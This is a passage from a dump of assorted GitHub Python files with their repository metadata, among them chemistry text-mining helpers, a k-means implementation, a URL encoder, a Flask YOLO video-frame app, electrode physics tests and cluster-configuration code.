database):\n \"\"\" find original word\n :param word: (str) word\n :param database: (dict) dictionary of DataStorage, UnitStorage\n :return: (str) original word\n \"\"\"\n\n ELEMENT = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\", \"Ar\", \"K\",\n \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Co\", \"Ni\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\", \"Se\", \"Br\", \"Kr\",\n \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\", \"In\", \"Sn\", \"Sb\", \"Te\", \"I\",\n \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\", \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\",\n \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\", \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\",\n \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\", \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\",\n \"Db\", \"Sg\", \"Bh\", \"Hs\", \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\", \"Uue\"]\n\n tag = identify_tag(word)\n\n if not tag:\n return word\n elif tag == 'number':\n num = regex.match(r\"^-num[(](?P.+)[)]-$\", word)\n if num:\n return num.group(\"num\")\n return \"-num-\"\n elif tag == 'element':\n index = regex.match(r\"^-e(\\d+)-$\", word).group(1)\n return ELEMENT[int(index)]\n elif tag == 'strange':\n strange = regex.match(r\"^-strange[(](?P.+)[)]-$\", word)\n if strange:\n return strange.group(\"strange\")\n else:\n return None\n else:\n try:\n data_storage = database[tag]\n except KeyError:\n raise DatabaseError(f'{tag} not in database dictionary')\n\n return data_storage[word]\n\n\ndef _change_to_regex_string(chemical_list, original_list=None, return_as_str=False):\n \"\"\"\n Change to regex form string / list\n :param chemical_list: (list) list of chemical\n :param original_list: (list) list that original change_to_re list\n :param return_as_str: (bool) if True, return (str). 
Else, return list\n :return: (list or str)\n \"\"\"\n\n new_list = []\n if isinstance(chemical_list, str):\n chemical_list = [chemical_list]\n if not isinstance(original_list, list):\n original_list = []\n\n for chemical in chemical_list:\n if not chemical:\n continue\n elif not isinstance(chemical, str):\n chemical = str(chemical)\n\n chemical_revised = regex.sub(pattern=r\"(?:\\[|\\]|\\(|\\)|\\.|\\,|\\-|\\*|\\?|\\{|\\}|\\$|\\^|[|]|\\+|\\\\)\",\n string=chemical, repl=lambda t: r\"\\{}\".format(t.group()))\n\n if chemical_revised in original_list or chemical_revised in new_list:\n continue\n elif regex.match(pattern=chemical_revised, string=chemical): # Assert re_form == original form\n new_list.append(chemical_revised)\n else:\n raise AssertionError\n\n new_list += original_list\n new_list = sorted(new_list, reverse=True)\n\n if return_as_str:\n return r\"|\".join(new_list)\n else:\n return new_list\n","repo_name":"Molsim-Group/MOFtextminer","sub_path":"doc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10821,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"30116223623","text":"\"\"\"\nPlot potential lineage drivers\n------------------------------\n\nThis example shows how to compute and plot expression trends for genes which may be involved in lineage decisions.\n\nWe identify these by correlating gene expression with absorption probabilities towards a specific terminal state.\n\"\"\"\n\nimport cellrank as cr\n\nadata = cr.datasets.pancreas_preprocessed(\"../example.h5ad\")\nadata\n\n# %%\n# First, we need to compute the terminal states and the absorption probabilities towards them.\ncr.tl.terminal_states(\n adata,\n cluster_key=\"clusters\",\n n_cells=30,\n n_states=3,\n softmax_scale=4,\n show_progress_bar=False,\n)\ncr.tl.lineages(adata)\n\n# %%\n# Once the lineages have been computed, we can compute the potential driver genes for each of them. It is also\n# possible to restrict this computation to just a few clusters, defined by ``cluster_key`` and ``clusters``.\n#\n# By default we are computing the driver genes for all lineages.\ndrivers = cr.tl.lineage_drivers(adata, lineages=\"Alpha\")\ndrivers\n\n# %%\n# Finally, we can plot the potential drivers. 
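 These candidates are identified by correlating gene expression with the absorption probabilities computed above. 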
Below we plot the top 3 driver genes for the `'Alpha'` lineage.\ncr.pl.lineage_drivers(adata, lineage=\"Alpha\", n_genes=3)\n","repo_name":"grenkoca/cellrank","sub_path":"examples/plotting/plot_lineage_drivers.py","file_name":"plot_lineage_drivers.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"1781748675","text":"import sys\nfrom urllib.parse import unquote\nfrom urllib.parse import quote_plus\n\ndef usage():\n    print (\"Usage: python url_coder.py encode|decode string\")\n\ntry:\n    if sys.argv[2] != \"\":\n        inputstr=sys.argv[2]\nexcept:\n    usage()\n    sys.exit()\n\ntry:\n    if sys.argv[1] == \"decode\":\n        print (unquote(inputstr))\n    elif sys.argv[1] == \"encode\":\n        print (quote_plus(inputstr))\n    else:\n        usage()\nexcept:\n    usage()\n    sys.exit()\n\n","repo_name":"LancreFI/shellScripts","sub_path":"url_coder.py","file_name":"url_coder.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70991913959","text":"\nimport numpy as np\nclass Kmean:\n    def __init__(self, data, k):\n        self.data = data\n        self.k = k # k-cluster\n        self.m = data.shape[0] # number of samples\n        self.n = data.shape[1] # number of features\n    \n    def EuclidDist(self, arrA, arrB):\n        '''calculate the Euclidean distance between two vectors'''\n        return np.sqrt(np.sum([item*item for item in (arrA-arrB)]))\n    \n    def InitCenter(self):\n        ''' randomly initialize a point as the center '''\n        data = self.data\n        n = self.n\n        k = self.k\n        centers = np.zeros((k, n))\n        for i in range(n):\n            minValue = np.min(data[:, i]) # the minimum value of the column\n            rangeI = np.max(data[:, i]) - minValue # the range of the column\n            centers[:, i] = minValue + rangeI * np.random.rand(k) # shape (k,), so the centers stay within the data range\n        return centers\n\n    def kmeans(self):\n        m = self.m\n        k = self.k\n        data = self.data\n        cluster = np.zeros((m, 2))\n        Centers = self.InitCenter()\n        Changed = True # flag to continue the update of center or not\n        while Changed:\n            Changed = False\n            for i in range(m):\n                minDist, minIndex = np.inf, -1\n                for j in range(k):\n                    dist = self.EuclidDist(Centers[j, :], data[i, :]) # calculate the distance of each point\n                    if dist < minDist: # find the minimum distance\n                        minDist = dist \n                        minIndex = j # assign the label to the point\n                if cluster[i, 0] != minIndex:\n                    Changed = True\n                cluster[i,:] = minIndex, minDist * minDist\n            \n            for j in range(k):\n                pointInCluster = data[np.nonzero(cluster[:,0] == j)[0]]\n                Centers[j, :] = np.mean(pointInCluster, axis=0)\n        return Centers, cluster\n\n","repo_name":"leovam/machine-learning-in-python","sub_path":"kmeans/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14730354364","text":"from app_config import config\nfrom env_setup import setup_test_paths\n\nsetup_test_paths()\n\nfrom agar.test import BaseTest\nfrom google_cloud_messaging import GoogleCloudMessaging\nfrom device_message_processor import (change_intent, post_unmanaged_device_info)\nfrom mockito import when\n\n__author__ = 'Bob MacNeal <bob.macneal@agosto.com>'\n\n\nclass TestDeviceMessageProcessor(BaseTest):\n    TEST_GCM_REGISTRATION_ID = '8d70a8d78a6dfa6df76dfasd'\n    DEVICE_KEY = '00d70a8d78a6dfa6df76d112'\n\n    def setUp(self):\n        super(TestDeviceMessageProcessor, self).setUp()\n\n    def test_change_intent_invokes_google_cloud_messaging_notify_method(self):\n        
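# mockito stubs GoogleCloudMessaging.notify below, so no real push notification is sent\n        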
gcm_registration_id = self.TEST_GCM_REGISTRATION_ID\n registration_ids = [gcm_registration_id]\n payload = 'skykit.com/skdchromeapp/reset'\n data_dictionary = {'intent': payload}\n when(GoogleCloudMessaging).notify(registration_ids, data_dictionary, test_mode=False).thenReturn(None)\n change_intent(\n gcm_registration_id=gcm_registration_id,\n payload=payload,\n device_urlsafe_key='asdlkfjadksfj',\n host='http://localhost:3000',\n user_identifier='bob.macneal@agosto.com')\n\n def test_send_unmanaged_device_info_invokes_google_cloud_messaging_notify_method(self):\n gcm_registration_id = self.TEST_GCM_REGISTRATION_ID\n registration_ids = [gcm_registration_id]\n device_urlsafe_key = 'ahtzfnNreWtpdC1kaXNwbGF5LWRldmljZS1pbnRyGwsSDkNocm9tZU9zRGV2aWNlGICAgIDrop4KDA'\n data_dictionary = dict(deviceKey=device_urlsafe_key, apiToken=config.UNMANAGED_API_TOKEN)\n when(GoogleCloudMessaging).notify(registration_ids, data_dictionary, test_mode=False).thenReturn(None)\n post_unmanaged_device_info(gcm_registration_id, device_urlsafe_key, 'http://localhost:3000/')\n","repo_name":"agosto-travisblanton/fork-test","sub_path":"tests/test_device_message_processor.py","file_name":"test_device_message_processor.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41817779945","text":"import stack.commands\nfrom stack.exception import ArgRequired, CommandError\n\n\nclass Command(stack.commands.remove.appliance.command):\n\t\"\"\"\n\tRemove a firewall service rule for an appliance type.\n\tTo remove the rule, you must supply the name of the rule.\n\n\t\n\tName of an appliance type (e.g., \"backend\").\n\t\n\n\t\n\tName of the Appliance-specific rule\n\t\n\t\"\"\"\n\n\tdef run(self, params, args):\n\t\tif len(args) == 0:\n\t\t\traise ArgRequired(self, 'appliance')\n\n\t\t(rulename, ) = self.fillParams([ ('rulename', None, True) ])\n\n\t\tfor appliance in self.getApplianceNames(args):\n\t\t\t# Make sure our rule exists\n\t\t\tif self.db.count(\"\"\"\n\t\t\t\t(*) from appliance_firewall\n\t\t\t\twhere name=%s and appliance=(\n\t\t\t\t\tselect id from appliances where name=%s\n\t\t\t\t)\"\"\", (rulename, appliance)\n\t\t\t) == 0:\n\t\t\t\traise CommandError(\n\t\t\t\t\tself,\n\t\t\t\t\tf'firewall rule {rulename} does not '\n\t\t\t\t\tf'exist for appliance {appliance}'\n\t\t\t\t)\n\n\t\t\t# It exists, so delete it\n\t\t\tself.db.execute(\"\"\"\n\t\t\t\tdelete from appliance_firewall\n\t\t\t\twhere name=%s and appliance=(\n\t\t\t\t\tselect id from appliances where name=%s\n\t\t\t\t)\n\t\t\t\"\"\", (rulename, appliance))\n","repo_name":"sukhbir148/stacki","sub_path":"common/src/stack/command/stack/commands/remove/appliance/firewall/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"36562168401","text":"from flask import Flask, render_template, request, jsonify\nfrom detect import run\nimport os\nfrom moviepy.editor import VideoFileClip\nimport cv2\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('home.html')\n\n\n@app.route('/process_video', methods=['POST'])\ndef process_image():\n video_file = request.files['video'] # 사용자가 업로드한 동영상 파일\n upload_dir = \"../image/\"\n upload_path = os.path.join(upload_dir, video_file.filename)\n \n frames = []\n cap = cv2.VideoCapture(upload_path)\n fps = cap.get(cv2.CAP_PROP_FPS)\n \n frame_count = 
int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n duration = frame_count / fps\n \n current_time = 0\n while current_time < duration:\n cap.set(cv2.CAP_PROP_POS_MSEC, int(current_time * 1000))\n success, frame = cap.read()\n if not success:\n break\n\n frames.append(frame)\n current_time += 1 \n cap.release()\n \n results = []\n for i, frame in enumerate(frames):\n save_dir = '../image/frame/' # 이미지를 저장할 경로와 파일명\n frame_path = os.path.join(save_dir, f\"frame_{i}.png\")\n cv2.imwrite(frame_path, frame)\n cnt, lab, save_path = run(weights='./runs/train/person_yolov5s_results/weights/best.pt', conf_thres=0.5, source=frame_path, exist_ok=True, line_thickness=2)\n result = {\n 'cnt': cnt,\n 'lab': lab,\n 'save_path': save_path\n }\n results.append(result)\n \n length = len(results)\n # 결과를 다른 템플릿으로 전달\n return render_template(\"result_frame.html\", results=results,length=length)\n #return jsonify(results=results, length=length)\n\nif __name__ == '__main__':\n app.run( host='127.0.0.1',port=5000, debug=True)\n ","repo_name":"minhyeong0208/detect_person","sub_path":"rendering_frame copy.py","file_name":"rendering_frame copy.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28986813578","text":"import argparse\r\n#argparse的库可以在命令行中传入参数并让程序运行\r\n\"\"\"\r\nHere are the param for the training\r\n\r\n\"\"\"\r\n\r\n\r\ndef get_args():\r\n parser = argparse.ArgumentParser()\r\n # the environment setting\r\n #type是传入的参数数据类型 help是该参数的提示信息 default是默认参数\r\n\r\n '''\r\n 使用时:\r\n python demo.py -h\r\n '''\r\n parser.add_argument('--env-name', type=str,\r\n default='HandManipulateBlockRotateZ-v0', help='the environment name') # 'FetchPush-v1'\r\n parser.add_argument('--n-epochs', type=int, default=50,\r\n help='the number of epochs to train the agent')\r\n parser.add_argument('--n-cycles', type=int, default=50,\r\n help='the times to collect samples per epoch')\r\n parser.add_argument('--n-batches', type=int, default=40,\r\n help='the times to update the network')\r\n parser.add_argument('--save-interval', type=int, default=5,\r\n help='the interval that save the trajectory')\r\n parser.add_argument('--seed', type=int, default=123, help='random seed')\r\n parser.add_argument('--num-workers', type=int, default=4,\r\n help='the number of cpus to collect samples')\r\n parser.add_argument('--replay-strategy', type=str,\r\n default='future', help='the HER strategy')\r\n parser.add_argument('--clip-return', type=float,\r\n default=50, help='if clip the returns')\r\n parser.add_argument('--save-dir', type=str,\r\n default='saved_models/', help='the path to save the models')\r\n parser.add_argument('--noise-eps', type=float,\r\n default=0.2, help='noise eps')\r\n parser.add_argument('--random-eps', type=float,\r\n default=0.3, help='random eps')\r\n parser.add_argument('--buffer-size', type=int,\r\n default=int(1e6), help='the size of the buffer')\r\n parser.add_argument('--replay-k', type=int, default=4,\r\n help='ratio to be replace')\r\n parser.add_argument('--clip-obs', type=float,\r\n default=200, help='the clip ratio')\r\n parser.add_argument('--batch-size', type=int,\r\n default=256, help='the sample batch size')\r\n parser.add_argument('--gamma', type=float, default=0.98,\r\n help='the discount factor')\r\n parser.add_argument('--action-l2', type=float, default=1, help='l2 reg')\r\n parser.add_argument('--lr-actor', type=float, default=0.001,\r\n help='the learning rate of the actor')\r\n 
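# a separate learning rate is configured for the critic network below\r\n    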
parser.add_argument('--lr-critic', type=float, default=0.001,\r\n help='the learning rate of the critic')\r\n parser.add_argument('--polyak', type=float, default=0.95,\r\n help='the average coefficient')\r\n parser.add_argument('--n-test-rollouts', type=int,\r\n default=10, help='the number of tests')\r\n parser.add_argument('--clip-range', type=float,\r\n default=5, help='the clip range')\r\n parser.add_argument('--demo-length', type=int,\r\n default=20, help='the demo length')\r\n parser.add_argument('--cuda', action='store_true',\r\n help='if use gpu do the acceleration')\r\n parser.add_argument('--num-rollouts-per-mpi', type=int,\r\n default=2, help='the rollouts per mpi')\r\n\r\n args = parser.parse_args()\r\n\r\n return args\r\n\r\n\r\nclass Args:\r\n def __init__(self):\r\n self.n_epochs = 500 # 50\r\n self.n_cycles = 50\r\n self.n_batches = 40\r\n self.save_interval = 5\r\n self.seed = 1 # 为了复现方便,可以设一个seed,这次运行是全随机的,但下次别人运行可以用这个seed,会完全重现我的训练过程 \r\n self.num_workers = 16 # 1\r\n self.replay_strategy = 'future'\r\n self.clip_return = 50\r\n self.save_dir = 'saved_models_random_target/'\r\n self.noise_eps = 0.01 # 使用网络的action时额外增加的噪声\r\n self.random_eps = 0.3 # 有0.3 的概率完全使用随机动作\r\n self.buffer_size = 1e6/2 # 1e6的buffer存5000回合数据,可以小点\r\n self.replay_k = 4 # replay with k random states which come from the same episode as the transition being replayed and were observed after it\r\n self.clip_obs = 200\r\n self.batch_size = 256\r\n self.gamma = 0.98\r\n self.action_l2 = 1\r\n self.lr_actor = 0.001\r\n self.lr_critic = 0.001\r\n self.polyak = 0.95 # 软更新率\r\n self.n_test_rollouts = 25 #在训练时测试次数\r\n self.clip_range = 5\r\n self.demo_length = 100 # 20, 这个是demo时候用的,可以跳大点\r\n self.cuda = True\r\n self.num_rollouts_per_mpi = 2\r\n self.add_demo = True # add demo data or not\r\n self.demo_name=\"myrobot_1000_reach_demo.npz\"\r\n self.env_name = 'my_robot_plus'","repo_name":"PeiZhangNEU/open_manipulator_x_hasgravity","sub_path":"RLlib/DDPG_HER/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"35123784961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 30 18:47:22 2020\n@Tp-2\n@author: gtchi\n\"\"\"\nfrom Game import Game\nfrom tkinter import Tk, PhotoImage, StringVar, Label, Button, Entry, Frame\n\n\n\nclass UI:\n def __init__(self,game):\n self.__game = game\n #Creation de la fenetre\n self.__root = Tk()\n self.__root.title('Jeu du pendu')\n #defintion des variable\n self.__imgs=[PhotoImage(file=f\"../data/img/bonhomme{9-i}.gif\") for i in range(1,9)]\n self.__letter = StringVar()\n self.__hiddenword = StringVar()\n self.__error = StringVar()\n def getGame(self):\n return self.__game\n \n \n \n def start(self):\n \"\"\"Tkinter game\"\"\"\n \n \n def replay(message,message2=''):\n def restart():\n replay.destroy()\n self.__root = Tk()\n self.__root.title('Jeu du pendu')\n self.start()\n game.end()\n replay = Tk()\n Label(replay, text= message).pack(side = 'top')\n Label(replay, text= message2).pack(side = 'top')\n replay.title('Voulez vous rejouer')\n Label(replay, text='Voulez vous rejouez ?').pack(side = 'top')\n Button(replay, bg='grey', text = 'Oui' ,command = restart).pack(side = 'bottom')\n Button(replay, bg='grey', text = 'Non' ,command = replay.destroy).pack(side = 'bottom')\n replay.mainloop()\n \n def verification():\n #verifie la lettre et affiche le message\n self.__error.set(game.checkLetter(self.__letter.get()))\n 
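# the feedback message returned by checkLetter is shown via the error StringVar label\n            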
self.__letter.set('') #reinitialisation de l'entry\n self.__hiddenword.set(game.getCurrent().getHiddenWord())#modification du mot\n #modification de l'image\n image.configure(image=self.__imgs[game.getTour()])\n #image.image=img2 #permet de ne pas faire disparaitre img2 par GC (GarbageCollect)\n \n #verification des fin de partie\n if game.getCurrent().getHiddenWord()==game.getCurrent().getWord():\n self.__root.destroy()\n replay('victoire!')\n if game.getTour()>=game.nbTour:\n self.__root.destroy()\n replay('Perdu...', \"Le mot etait \"+game.getCurrent().getWord())\n \n #Initialisation du jeu \n game = self.getGame()\n game.start()\n \n \n \n #Remise à 0 des variables\n self.__hiddenword.set(game.getCurrent().getHiddenWord())\n self.__letter.set('')\n self.__error.set('')\n \n \n #creation de ma frame\n Frame1 = Frame(self.__root)\n Frame1.pack()\n \n #contenu de ma fenetre\n Button(Frame1, bg='grey', text = 'Quitter' ,command = self.__root.destroy).pack(side = 'bottom')\n Label(Frame1, textvariable = self.__hiddenword).pack(side = 'left')\n Entry(Frame1, textvariable = self.__letter).pack(side = 'left')\n Label(Frame1, textvariable = self.__error).pack(side = 'left')\n Button(Frame1, text ='PROPOSER', command = verification).pack(side='left')\n image = Label(Frame1, image=self.__imgs[0])\n image.pack()\n \n self.__root.mainloop()\n \nif __name__ == '__main__':\n UI(Game('Words.txt')).start()\n\n","repo_name":"Gtchik/CS-DEV-2","sub_path":"src/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39840934084","text":"from __future__ import (absolute_import, print_function,\n unicode_literals, division)\n\nimport unittest\n\nimport numpy as np\nfrom numpy import testing as nptest\nfrom scipy.special import sph_harm\n\nfrom electrode import transformations, utils, electrode\n\n\nclass BasicFunctionsCase(unittest.TestCase):\n def test_dummy_pool(self):\n f = lambda x, y=1, *a, **k: (x, y, a, k)\n r = utils.DummyPool().apply_async(f, (2, 3, 4), {\"a\": 5})\n self.assertEqual(r.get(), (2, 3, (4,), {\"a\": 5}))\n\n def test_apply_method(self):\n class C:\n def m(self, a):\n return a\n self.assertEqual(utils.apply_method(C(), \"m\", 1), 1)\n\n def test_norm(self):\n self.assertEqual(utils.norm([1,2,3.]), 14**.5)\n self.assertEqual(utils.norm([[1,2,3.]], 1), 14**.5)\n\n def test_expand_tensor(self):\n a = np.array([1, 2, 3.])[None, :]\n nptest.assert_equal(utils.expand_tensor(a), a)\n b = np.array([1, 2, 3, 4, 5])[None, :]\n b1 = np.array([1, 2, 3, 2, 4, 5, 3, 5, -5] # triu\n ).reshape((1, 3, 3))\n nptest.assert_equal(utils.expand_tensor(b), b1)\n c = np.random.random(5)\n ti, tj = np.triu_indices(3)\n ce = utils.expand_tensor(c[None, :])[0, ti, tj]\n nptest.assert_equal(ce[:5], c)\n nptest.assert_equal(ce[5], -c[0]-c[3])\n \n def test_expand_select_tensor(self):\n for n in 3, 5, 7, 9, 11:\n d = np.random.random(n)[None, :]\n de = utils.expand_tensor(d)\n ds = utils.select_tensor(de)\n nptest.assert_equal(d, ds)\n\n def test_expand_tensor_trace(self):\n d = np.random.random(5)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), 0)\n d = np.random.random(7)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), np.zeros((3)))\n d = np.random.random(9)[None, :]\n de = utils.expand_tensor(d)\n nptest.assert_almost_equal(de[0].trace(), np.zeros((3,3)))\n d = np.random.random(11)[None, :]\n de = utils.expand_tensor(d)\n 
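# 11 independent components expand to a rank-5 tensor whose trace is a zero 3x3x3 tensor\n        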
nptest.assert_almost_equal(de[0].trace(), np.zeros((3,3,3)))\n\n def test_rotate_tensor_identity(self):\n dr = np.identity(3)\n d = np.arange(3).reshape((1,3,))\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 1))\n d = np.arange(3**2).reshape((1,3,3))\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 2))\n d = np.arange(3**3).reshape(1,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 3))\n d = np.arange(3**4).reshape(1,3,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 4))\n d = np.arange(3**2*5).reshape(5,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 2))\n d = np.arange(3**4*5).reshape(5,3,3,3,3)\n nptest.assert_almost_equal(d, utils.rotate_tensor(d, dr, 4))\n \n def test_rotate_tensor_rot(self):\n r = transformations.euler_matrix(*np.random.random(3))[:3, :3]\n d = np.arange(3**3*5).reshape(5,3,3,3)\n dr = utils.rotate_tensor(d, r, 3)\n drr = utils.rotate_tensor(dr, r.T, 3)\n nptest.assert_almost_equal(d, drr)\n\n def test_rotate_tensor_simple(self):\n r = transformations.euler_matrix(0, 0, np.pi/2, \"sxyz\")[:3, :3]\n d = np.arange(3)\n nptest.assert_almost_equal(d[[1, 0, 2]],\n utils.rotate_tensor(d, r, 1))\n d = np.arange(9).reshape(1,3,3)\n nptest.assert_almost_equal([[[4, -3, 5], [-1, 0, -2], [7, -6, 8]]],\n utils.rotate_tensor(d, r, 2))\n\n def test_centroid_area(self):\n p = np.array([[1, 0, 0], [2, 3, 0], [2, 7, 0], [3, 8, 0],\n [-2, 8, 0], [-5, 2, 0.]])\n a, c = utils.area_centroid(p)\n nptest.assert_almost_equal(a, 40)\n nptest.assert_almost_equal(c, [-0.7833333, 4.2083333, 0])\n\n def test_mathieu(self):\n a = np.array([.005])\n q = np.array([.2**.5])\n mu, b = utils.mathieu(1, a, q)\n nptest.assert_almost_equal(mu.real, 0., 9)\n mui = sorted(mu.imag[mu.imag > 0])\n nptest.assert_almost_equal(mui[0], (a+q**2/2)**.5, 2)\n nptest.assert_almost_equal(mui[0], [.33786], 5)\n n = 3\n a = np.arange(n**2).reshape(n,n)\n q = np.arange(n**2)[::-1].reshape(n,n)*10\n mu, b = utils.mathieu(3, a, q)\n #nptest.assert_almost_equal(mu, [.1, .2, .3])\n #nptest.assert_almost_equal(b, )\n\n def test_polygon_value(self):\n p = np.array([[1., 0], [2, 3], [2, 7], [3, 8],\n [-2, 8], [-5, 2]])\n x = np.array([[1,2,3.]])\n nptest.assert_almost_equal(\n electrode.polygon_potential(x, [p], 1, 0, 0, 0, None),\n [[.24907]])\n \n def test_polygon_value_grad(self):\n p = np.array([[1., 0], [2, 3], [2, 7], [3, 8],\n [-2, 8], [-5, 2]])\n x = np.array([[1,2,3.]])\n nptest.assert_almost_equal(\n electrode.polygon_potential(x, [p], 1, 1, 0, 0, None),\n [[-0.0485227, 0.0404789, -0.076643]])\n\n\nclass SphHarmCase(unittest.TestCase):\n def setUp(self):\n c = np.ones(3)*0.\n s = np.ones(3)*1.\n self.nn = 3\n n = np.ones(3)*(self.nn*2+1)\n o = c-(n-1)/2*s\n self.x = np.mgrid[[slice(oi, oi+ni*si, si) for oi, ni, si in\n zip(o, n, s)]]\n self.xt = self.x.reshape(3, -1).T\n xy = np.square(self.x[:2]).sum(0)\n self.r = np.sqrt(xy+np.square(self.x[2]))\n self.theta = np.arctan2(np.sqrt(xy), self.x[2])\n self.phi = np.arctan2(self.x[1], self.x[0])\n self.e = electrode.GridElectrode(data=[], origin=o, spacing=s)\n\n def test_analysis(self):\n n = 6\n for l in range(n):\n for m in range(-l, l+1):\n y = sph_harm(abs(m), l, self.phi, self.theta)\n y = {-1: 2**.5*y.real, 0: y.real, 1: 2**.5*y.imag}[np.sign(m)]\n self.e.data = [(y*self.r**l)[:, :, :, None]]\n self.e.generate(n)\n for k in range(n):\n p = self.e.potential(self.xt, k).T\n a = utils.cartesian_to_spherical_harmonics(p)\n a = a.T.reshape(self.x[0].shape + (a.shape[0],))\n ac = a[self.nn, self.nn, 
self.nn]\n if k == l:\n nptest.assert_allclose(ac, np.identity(2*l+1)[l-m],\n rtol=1e-12, atol=1e-12)\n elif not (l > k and (l-k)%2 == 0): # FIXME\n nptest.assert_allclose(ac, 0, atol=1e-12)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"nist-ionstorage/electrode","sub_path":"electrode/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"9364444585","text":"string = input()\nabc = 'abcdefghijklmnopqrstuvwxyz'\nliist = []\nfor i in abc:\n a = string.count(i)\n if a > 0:\n liist.append(a)\ncount_2 = 0\ncount_not2 = 0\nfor i in liist:\n if i % 2 == 0 and i != 0:\n count_2 += 1\n elif i != 0:\n count_not2 += 1\nif (count_2 == 1 and count_not2 == 0) or (count_not2 == 1 and count_2 == 0):\n print(\"YES\")\nelif count_not2 > 1:\n print(\"NO\")\nelse:\n print(\"YES\")\n\n \n","repo_name":"AndrewOleksiuk/Algorithms","sub_path":"algotester0331.py","file_name":"algotester0331.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24860552563","text":"import abc\nimport sys\nfrom abc import abstractmethod\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nfrom pcluster.utils import (\n error,\n get_availability_zone_of_subnet,\n get_supported_az_for_one_instance_type,\n is_hit_enabled_cluster,\n)\n\nif sys.version_info >= (3, 4):\n ABC = abc.ABC\nelse:\n ABC = abc.ABCMeta(\"ABC\", (), {})\n\n\nclass ClusterModel(ABC):\n \"\"\"\n Describes the model of the cluster produced by a configuration.\n\n The currently supported cluster models are:\n - SIT: Single Instance Type - One single queue and one instance type per queue\n - HIT: Heterogeneous Instance Types - Multiple queues and multiple instance types per queue\n \"\"\"\n\n def __init__(self, name):\n self.name = name\n\n @abstractmethod\n def get_cluster_section_definition(self):\n \"\"\"Get the cluster section definition used by the cluster model.\"\"\"\n pass\n\n @abstractmethod\n def test_configuration(self, pcluster_config):\n \"\"\"Do dryrun tests for the configuration.\"\"\"\n pass\n\n @abstractmethod\n def get_start_command(self, pcluster_config):\n \"\"\"Get the start command for the model.\"\"\"\n pass\n\n @abstractmethod\n def get_stop_command(self, pcluster_config):\n \"\"\"Get the stop command for the model.\"\"\"\n pass\n\n def _ec2_run_instance(self, pcluster_config, **kwargs): # noqa: C901 FIXME!!!\n \"\"\"Wrap ec2 run_instance call. 
